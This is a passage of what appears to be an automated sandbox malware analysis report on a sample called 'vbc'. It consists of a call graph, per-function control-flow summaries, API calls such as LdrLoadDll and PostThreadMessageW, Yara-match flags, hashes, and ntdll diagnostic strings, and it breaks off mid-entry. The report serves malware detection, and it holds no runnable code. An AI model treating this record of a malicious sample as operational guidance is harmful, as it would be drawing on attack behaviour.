92628->92633 92630 413b1b 92631 413b60 92630->92631 92632 413b4f PostThreadMessageW 92630->92632 92632->92631 92635 4172a7 92633->92635 92634 4172ae 92634->92630 92635->92634 92636 4172e3 LdrLoadDll 92635->92636 92637 4172fa 92635->92637 92636->92637 92637->92630 92740 413573 92743 42c2a3 92740->92743 92744 42c2bd 92743->92744 92747 5612c70 LdrInitializeThunk 92744->92747 92745 413595 92747->92745 92748 41ad93 92749 41add7 92748->92749 92750 42c003 NtClose 92749->92750 92751 41adf8 92749->92751 92750->92751 92752 418856 92755 4186ff 92752->92755 92756 418692 92752->92756 92753 42c003 NtClose 92754 418842 92753->92754 92756->92753 92756->92755 92638 401a2e 92639 401a3d 92638->92639 92642 42f743 92639->92642 92645 42dc73 92642->92645 92646 42dc99 92645->92646 92657 407183 92646->92657 92648 42dcaf 92656 401a70 92648->92656 92660 41aba3 92648->92660 92650 42dcce 92651 42dce3 92650->92651 92675 42c3d3 92650->92675 92671 427c63 92651->92671 92654 42dcfd 92655 42c3d3 ExitProcess 92654->92655 92655->92656 92659 407190 92657->92659 92678 415f43 92657->92678 92659->92648 92661 41abcf 92660->92661 92696 41aa93 92661->92696 92664 41ac14 92667 41ac30 92664->92667 92669 42c003 NtClose 92664->92669 92665 41abfc 92666 41ac07 92665->92666 92702 42c003 92665->92702 92666->92650 92667->92650 92670 41ac26 92669->92670 92670->92650 92672 427cc5 92671->92672 92674 427cd2 92672->92674 92710 4180f3 92672->92710 92674->92654 92676 42c3f0 92675->92676 92677 42c401 ExitProcess 92676->92677 92677->92651 92679 415f60 92678->92679 92680 415f79 92679->92680 92682 415f97 92679->92682 92694 42adc3 NtClose LdrInitializeThunk 92679->92694 92680->92659 92687 42ca73 92682->92687 92684 415fce 92684->92680 92695 428983 NtClose LdrInitializeThunk 92684->92695 92686 41601c 92686->92659 92689 42ca8d 92687->92689 92688 42cabc 92688->92684 92689->92688 92690 42b613 LdrInitializeThunk 92689->92690 92691 42cb19 92690->92691 92692 42e0b3 RtlFreeHeap 92691->92692 92693 42cb32 92692->92693 92693->92684 92694->92682 92695->92686 92697 41aaad 92696->92697 92701 41ab89 92696->92701 92705 42b6b3 92697->92705 92700 42c003 NtClose 92700->92701 92701->92664 92701->92665 92703 42c01d 92702->92703 92704 42c02e NtClose 92703->92704 92704->92666 92706 42b6cd 92705->92706 92709 56135c0 LdrInitializeThunk 92706->92709 92707 41ab7d 92707->92700 92709->92707 92712 41811d 92710->92712 92711 41861b 92711->92674 92712->92711 92718 413753 92712->92718 92714 41823e 92714->92711 92715 42e0b3 RtlFreeHeap 92714->92715 92716 418256 92715->92716 92716->92711 92717 42c3d3 ExitProcess 92716->92717 92717->92711 92722 413773 92718->92722 92720 4137dc 92720->92714 92721 4137d2 92721->92714 92722->92720 92723 41aeb3 RtlFreeHeap LdrInitializeThunk 92722->92723 92723->92721

                                                                Executed Functions

                                                                Function 00417283 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 91 417283-4172ac call 42edb3 94 4172b2-4172c0 call 42f3b3 91->94 95 4172ae-4172b1 91->95 98 4172d0-4172e1 call 42d743 94->98 99 4172c2-4172cd call 42f653 94->99 104 4172e3-4172f7 LdrLoadDll 98->104 105 4172fa-4172fd 98->105 99->98 104->105
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004172F5
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: fe612aa3d1b5742517d37b12b3a612cca01b15546c8e7c8025a9886ca340d8ad
                                                                • Instruction ID: b8e9ec97489930ceb070e3c8e335ec216fb0a7430ed99e7a48e9c59897d2eb09
                                                                • Opcode Fuzzy Hash: fe612aa3d1b5742517d37b12b3a612cca01b15546c8e7c8025a9886ca340d8ad
                                                                • Instruction Fuzzy Hash: 750152B5E0020DA7DB10DAE5DC42FDEB3B89B54308F0081AAF90897240F634EB498B95
                                                                Function 0042C003 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 116 42c003-42c03c call 404593 call 42d253 NtClose
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 53f763a2d87228db95e5af0c3939b1860b050437a5eb3830eef20bcffe050933
                                                                • Instruction ID: 7d7d02806afba75d350ac5760a8f26f5e734a2091cb1580d582ff9fe802a1f2d
                                                                • Opcode Fuzzy Hash: 53f763a2d87228db95e5af0c3939b1860b050437a5eb3830eef20bcffe050933
                                                                • Instruction Fuzzy Hash: 6BE086316002147BD610FA9ADC01F97775CDFC5714F04802AFB5CA7181C670B90187F4
                                                                Function 05612DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 132 5612df0-5612dfc LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c2025168d0cc196f93259b103b67f9a9763567bfafb95aee52ebd80bf2f597fd
                                                                • Instruction ID: 5e137bf6e0f84ae1d0f88f385d1b493d9caa7acd8c0056b2961ad9ebc1fd996a
                                                                • Opcode Fuzzy Hash: c2025168d0cc196f93259b103b67f9a9763567bfafb95aee52ebd80bf2f597fd
                                                                • Instruction Fuzzy Hash: 1890023220191413D11175584945707001987D0241FD5C412A042475CE9E568A52E521
                                                                Function 05612C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 131 5612c70-5612c7c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: fb1fe55e9b621635712f2e59d1ae1979246687f854cf7e638a0775573011059c
                                                                • Instruction ID: b6bde56269cf1e6d8a64afd89c4d6299ff91fb68fbc2c33da7a70cb5c557ade3
                                                                • Opcode Fuzzy Hash: fb1fe55e9b621635712f2e59d1ae1979246687f854cf7e638a0775573011059c
                                                                • Instruction Fuzzy Hash: 9990023220199802D1107558884574A001587D0301F99C411A442475CE8E958991B521
                                                                Function 05612B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 130 5612b60-5612b6c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c82c0012cc684277f7eb2820094ee107f7f40dd31e38ccc867527f7a852dcf35
                                                                • Instruction ID: c960b27e4c1a8c4f8df99b1a42f07605f182d0d8bec20945eac36cf1881aff76
                                                                • Opcode Fuzzy Hash: c82c0012cc684277f7eb2820094ee107f7f40dd31e38ccc867527f7a852dcf35
                                                                • Instruction Fuzzy Hash: EC90026220291003410575584855616401A87E0201B95C021E1014794ECD258991A525
                                                                Function 056135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 133 56135c0-56135cc LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 23ee1adce59ca2c2b134906ee9bf9a1440009b10f94c16088c679cc8011b79b7
                                                                • Instruction ID: d5edac57241f752b4fa2bf667e0dd4f79c2e37a4b616e31090be850e4335bd99
                                                                • Opcode Fuzzy Hash: 23ee1adce59ca2c2b134906ee9bf9a1440009b10f94c16088c679cc8011b79b7
                                                                • Instruction Fuzzy Hash: 12900232605A1402D10075584955706101587D0201FA5C411A042476CE8F958A51A9A2
                                                                Function 00413A87 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 413a87-413a89 1 413a8a-413a8b 0->1 2 413aaa-413ab8 1->2 3 413a8d-413a91 1->3 6 413b15-413b4d call 417283 call 404503 call 424823 2->6 7 413aba 2->7 4 413a93-413a95 3->4 5 413a47 3->5 4->2 10 413a49-413a4c 5->10 11 4139fa-4139fe 5->11 33 413b6d-413b73 6->33 34 413b4f-413b5e PostThreadMessageW 6->34 8 413ae5-413b0f call 42e153 call 42eb63 7->8 9 413abc 7->9 8->6 9->1 14 413abe-413ac7 9->14 15 413a4e-413a50 10->15 20 413a52-413a72 15->20 21 413a26 15->21 20->15 25 413a74-413a84 20->25 23 413a28-413a2a 21->23 23->23 27 413a2c-413a33 23->27 31 413a86 25->31 32 413a1e-413a24 25->32 27->5 31->0 32->21 34->33 35 413b60-413b6a 34->35 35->33
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: -zud0E$-zud0E
                                                                • API String ID: 0-3556970955
                                                                • Opcode ID: f8290966cb2668ca99d9394c46ce10977a1c1ec24e623923f9302a3282529da3
                                                                • Instruction ID: a870fb2ce97dbf828e5d162183e11aeb9a0c76af591ca0326e1fde22730b4b3b
                                                                • Opcode Fuzzy Hash: f8290966cb2668ca99d9394c46ce10977a1c1ec24e623923f9302a3282529da3
                                                                • Instruction Fuzzy Hash: 4931CB72E05109AFDB11DEA49C81CEF7B78DF42361B1480AAF59067242D62D4F838BA5
                                                                Function 00413ADD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(-zud0E,00000111,00000000,00000000), ref: 00413B5A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: -zud0E$-zud0E
                                                                • API String ID: 1836367815-3556970955
                                                                • Opcode ID: 4bc43212ac93fa169d676ce5f8e66fda2c4812308116d520256beeac3b4c4b54
                                                                • Instruction ID: 4ac535135396bb17deca79a037210cc89531421504248b08783f69d266aa238d
                                                                • Opcode Fuzzy Hash: 4bc43212ac93fa169d676ce5f8e66fda2c4812308116d520256beeac3b4c4b54
                                                                • Instruction Fuzzy Hash: E80108B2E4015C7AEB11EAE59C81DEF7B7CDF41694F00806DFA10A7282D67C4F0687A5
                                                                Function 00413AE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 52 413ae3-413af5 53 413afd-413b4d call 42eb63 call 417283 call 404503 call 424823 52->53 54 413af8 call 42e153 52->54 64 413b6d-413b73 53->64 65 413b4f-413b5e PostThreadMessageW 53->65 54->53 65->64 66 413b60-413b6a 65->66 66->64
                                                                APIs
                                                                • PostThreadMessageW.USER32(-zud0E,00000111,00000000,00000000), ref: 00413B5A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: -zud0E$-zud0E
                                                                • API String ID: 1836367815-3556970955
                                                                • Opcode ID: 2c6cf325c9b496c766a6c70f09718aed2f6d8433cd41239802cb84924f24e7c4
                                                                • Instruction ID: 92ba252b4f7dfee85a6ed8b0034d1193346a92ca048b29bfb25cf2a750cf8b9a
                                                                • Opcode Fuzzy Hash: 2c6cf325c9b496c766a6c70f09718aed2f6d8433cd41239802cb84924f24e7c4
                                                                • Instruction Fuzzy Hash: EC0104B2D0021C7ADB01AAE59C82DEF7B7CDF40694F008069FA10A7242E57C5F064BA5
                                                                Function 0042C333 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 106 42c333-42c374 call 404593 call 42d253 RtlAllocateHeap
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(?,0041E021,?,?,00000000,?,0041E021,?,?,?), ref: 0042C36F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 7fe3a8c3556c84ae845fe426c7cde924dbfabda77256b0d23c8b72b37fdbb06f
                                                                • Instruction ID: d3ca533b6fc011aa1b66efa48b51b08114f153336444eee9f1156083f868dd9b
                                                                • Opcode Fuzzy Hash: 7fe3a8c3556c84ae845fe426c7cde924dbfabda77256b0d23c8b72b37fdbb06f
                                                                • Instruction Fuzzy Hash: 04E06D71604314BBDA14EE99DC41EAB37ACEFC9710F00801AFA08A7241D671BD1087B8
                                                                Function 0042C383 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 111 42c383-42c3c4 call 404593 call 42d253 RtlFreeHeap
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4B4A49C8,00000007,00000000,00000004,00000000,00416AF6,000000F4), ref: 0042C3BF
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: c62be6cc92a3e58431fb62bc7859419cb4743e4f498431d4bdbd2b832dc52020
                                                                • Instruction ID: 47b5de9a726cc6e951440e3c8902ba289efd0177dcce2e06346b249c6b07df7d
                                                                • Opcode Fuzzy Hash: c62be6cc92a3e58431fb62bc7859419cb4743e4f498431d4bdbd2b832dc52020
                                                                • Instruction Fuzzy Hash: F1E06D75604304BBDA14EE99DC41EAB33ADEFC8710F004459FA08A7241C670B911CBF4
                                                                Function 0042C3D3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 121 42c3d3-42c40f call 404593 call 42d253 ExitProcess
                                                                APIs
                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,966F2C02,?,?,966F2C02), ref: 0042C40A
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0
                                                                • Opcode ID: 67262607e6efb244126f7288f1cf5530489ca23e64cd745992c46cb3281eb52f
                                                                • Instruction ID: 8a1218f05d0afbc145bff7dc862a213452f6f35a3462fdf9e19d91cb963f78f4
                                                                • Opcode Fuzzy Hash: 67262607e6efb244126f7288f1cf5530489ca23e64cd745992c46cb3281eb52f
                                                                • Instruction Fuzzy Hash: E4E04F35600214BBD610AA9ADC01F97B75CDBC9714F00405AFA0867141C6B1BA10C7B4
                                                                Function 05612C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 126 5612c0a-5612c0f 127 5612c11-5612c18 126->127 128 5612c1f-5612c26 LdrInitializeThunk 126->128
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c60cfca4ebe72fcdf4ac6928e5460d10125d59f9682450870d7616ff320ee495
                                                                • Instruction ID: 3aba54842acf319366314c0d3799dd2e6f10e70ac56bfcb6258b580e9cf80a8f
                                                                • Opcode Fuzzy Hash: c60cfca4ebe72fcdf4ac6928e5460d10125d59f9682450870d7616ff320ee495
                                                                • Instruction Fuzzy Hash: BCB09B729019D5C6DA51E7604A09B27791177D0701F59C061D3030795F4B38C1D1E575

                                                                Non-executed Functions

                                                                Function 05688D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Strings
                                                                • <unknown>, xrefs: 05688D2E, 05688D81, 05688E00, 05688E49, 05688EC7, 05688F3E
                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 05688F34
                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 05688DB5
                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 05688DC4
                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 05688DA3
                                                                • The critical section is owned by thread %p., xrefs: 05688E69
                                                                • read from, xrefs: 05688F5D, 05688F62
                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 05688F2D
                                                                • *** Inpage error in %ws:%s, xrefs: 05688EC8
                                                                • Go determine why that thread has not released the critical section., xrefs: 05688E75
                                                                • The instruction at %p referenced memory at %p., xrefs: 05688EE2
                                                                • an invalid address, %p, xrefs: 05688F7F
                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 05688E4B
                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 05688F3F
                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 05688F26
                                                                • a NULL pointer, xrefs: 05688F90
                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 05688E02
                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05688E3F
                                                                • The instruction at %p tried to %s , xrefs: 05688F66
                                                                • The resource is owned exclusively by thread %p, xrefs: 05688E24
                                                                • write to, xrefs: 05688F56
                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 05688FEF
                                                                • The resource is owned shared by %d threads, xrefs: 05688E2E
                                                                • *** then kb to get the faulting stack, xrefs: 05688FCC
                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 05688D8C
                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 05688DD3
                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05688E86
                                                                • *** enter .exr %p for the exception record, xrefs: 05688FA1
                                                                • *** enter .cxr %p for the context, xrefs: 05688FBD
                                                                • This failed because of error %Ix., xrefs: 05688EF6
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                • API String ID: 0-108210295
                                                                • Opcode ID: 783823c979b9b789677f37f1cc7592d835d562301c5d437413032c4cfab2ccac
                                                                • Instruction ID: b87137e9c6f56bd55c4904470fb570cfde21f6adbaa4f4dc24cdf9e1e7d6ce00
                                                                • Opcode Fuzzy Hash: 783823c979b9b789677f37f1cc7592d835d562301c5d437413032c4cfab2ccac
                                                                • Instruction Fuzzy Hash: F68105B5A80214BFCB21AB948C49D7B7F36FF4AB60F81498CF5056F212E7758841D762
                                                                Function 05652349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2160512332
                                                                • Opcode ID: 2d063090e2fe3b23ab7297a0c4b34b23eef77614b6329453a0c29454459a1b18
                                                                • Instruction ID: 6ef340b479d4ef84b3566569968f572c8b1190f76832fa776beafb4786b48399
                                                                • Opcode Fuzzy Hash: 2d063090e2fe3b23ab7297a0c4b34b23eef77614b6329453a0c29454459a1b18
                                                                • Instruction Fuzzy Hash: 5192BA79688342ABE721CF24C894F6BB7E9BB84764F04492DFA85D7350D770E844CB92
                                                                Function 05608620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 056454E2
                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 05645543
                                                                • Invalid debug info address of this critical section, xrefs: 056454B6
                                                                • Critical section address., xrefs: 05645502
                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0564540A, 05645496, 05645519
                                                                • undeleted critical section in freed memory, xrefs: 0564542B
                                                                • double initialized or corrupted critical section, xrefs: 05645508
                                                                • Critical section debug info address, xrefs: 0564541F, 0564552E
                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 056454CE
                                                                • Address of the debug info found in the active list., xrefs: 056454AE, 056454FA
                                                                • corrupted critical section, xrefs: 056454C2
                                                                • Critical section address, xrefs: 05645425, 056454BC, 05645534
                                                                • Thread identifier, xrefs: 0564553A
                                                                • 8, xrefs: 056452E3
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                • API String ID: 0-2368682639
                                                                • Opcode ID: 8e46e90cf18110112ede36713c5a7190e7d271183e70e31af3b5ccf3e9bc750f
                                                                • Instruction ID: 46bc29d15d243be7e2a9e13d3ed1979c3733b374fa1693ddae5eb09118917871
                                                                • Opcode Fuzzy Hash: 8e46e90cf18110112ede36713c5a7190e7d271183e70e31af3b5ccf3e9bc750f
                                                                • Instruction Fuzzy Hash: B9818EB1A00348EFEB24CF94C849FAEBBBABB48714F144159F505B7680D3B1A941DF50
                                                                Function 055EAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                • API String ID: 0-3197712848
                                                                • Opcode ID: b6e621f7b3e9340d2eb55f321d161c74458b71450f41305fc9bdca173fea4b19
                                                                • Instruction ID: 879fa6d99d309daf0ecd831ee981f50a0f88fe1a4e4b102035ba777a026ee433
                                                                • Opcode Fuzzy Hash: b6e621f7b3e9340d2eb55f321d161c74458b71450f41305fc9bdca173fea4b19
                                                                • Instruction Fuzzy Hash: C412F2716093468FD329DF28C849BBAB7E6BFC4714F04495DF8958B290EB70E944CB92
                                                                Function 05680CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                • API String ID: 0-1357697941
                                                                • Opcode ID: b86da9554cae1234bab7b145191ecf56f6040c9db9ce8bba0c0791504de2f37d
                                                                • Instruction ID: bd8b157d72f21b585867c1aac10c73aabed983576e5f9954fdb5fb8906382cdb
